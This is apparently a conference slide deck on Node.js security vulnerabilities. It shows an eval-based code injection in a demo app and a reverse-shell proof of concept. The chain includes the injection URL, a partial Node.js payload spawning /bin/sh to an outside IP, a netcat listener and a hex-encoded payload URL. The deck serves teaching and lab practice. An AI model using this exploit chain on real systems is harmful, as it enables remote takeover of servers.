This document discusses security vulnerabilities in Node.js applications. It begins with an introduction to Node.js and describes how to test for security issues. It then demonstrates a reverse shell vulnerability by injecting JavaScript code through a URL parameter. The document concludes with recommendations to avoid eval and provides references for further Node.js security information.

1. NODE JS SECURITY
VULNERABILITIES

2. ABOUT ME
Madhu Akula -
Automation Security Ninja at
Interested in Security & DevOps
Never ending learner!
@madhuakula
Appsecco

3. WHAT IS NODE JS?
Node.js is an open-source, cross-platform
runtime environment for developing server-
side Web applications.
Although Node.js is not a JavaScript
framework, many of its basic modules are
written in JavaScript, and developers can
write new modules in JavaScript. The
runtime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia

4. HELLO WORLD HTTP SERVER IN
NODE JS
var http = require('http');
var server = http.createServer(function(req, res) {
res.writeHead(200);
res.end('Hello World');
});
server.listen(2000);

5. WHY NODE JS SECURITY?
A lot of the application are moving to Javascript, especially
with MEAN (Mongo-Express-Angular-Node) stack.

6. HOW TO TEST NODE JS SECURITY?
It's similar to the normal web application security and adds
additional checks for the Javascript vulnerabilities.

7. DEMO TIME

8. REVERSE SHELL ON A NODE.JS
APPLICATION BY @WIREMASK
POC SETUP

9. VULNERABLE NODE JS CODE
'use strict'
const http = require('http');
const url = require('url');
const path = require('path');
const animalsJSON = path.join(__dirname, 'animals.json');
const animals = require(animalsJSON);
function requestHandler(req, res) {
let urlParams = url.parse(req.url, true);
let queryData = urlParams.query;
res.writeHead(200, {"Content­Type": "application/json"});

10. ACCESS THE APPLICATION
http://localhost:3000/?name=do*

11. IDENTIFICATION
The stringToRegexpfunction is evaluating user input to
create a RegExpobject and use it to find elements in an
array.
return eval(prefix + output + suffix); // we control output value

12. We can insert our own Javascript code in the output
variable and execute it. The stringToRegexpfunction
will escape some characters and the outputvalue will be
evaluated.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"]

13. EXPLOIT
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "172.28.128.1", function(){

14. START NETCAT LISTENER
nc ­lvp 8080

15. SAMPLE URL
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString(

16. HEX PAYLOAD CREATION USING PYTHON
>>> payload = 'nodejs reverse shell Java Script code'
>>> payload.encode('hex')

17. FINAL URL WITH PAYLOAD
http://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20

18. CHECK YOUR NETCAT LISTENER

19. CONCLUSION
It's highly recommended to avoid using the
evalfunction in a Javascript project. The
fix was rather simple, they started using
using the RegExpobject directly.

20. WANT TO TRY YOUR YOURSELF?
https://github.com/appsecco/vulnerable-apps
docker run ­p 3000:3000 ­d appsecco/node­reverse­shell

21. PLAYGROUND FOR NODEJS
VULNERABILITIES
DAMN VULNERABLE NODE APPLICATION
Ansible Playbook & Docker

22. NODE JS SECURITY REFERENCES
https://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/
https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec

23. THANK YOU
Q&A
@MADHUAKULA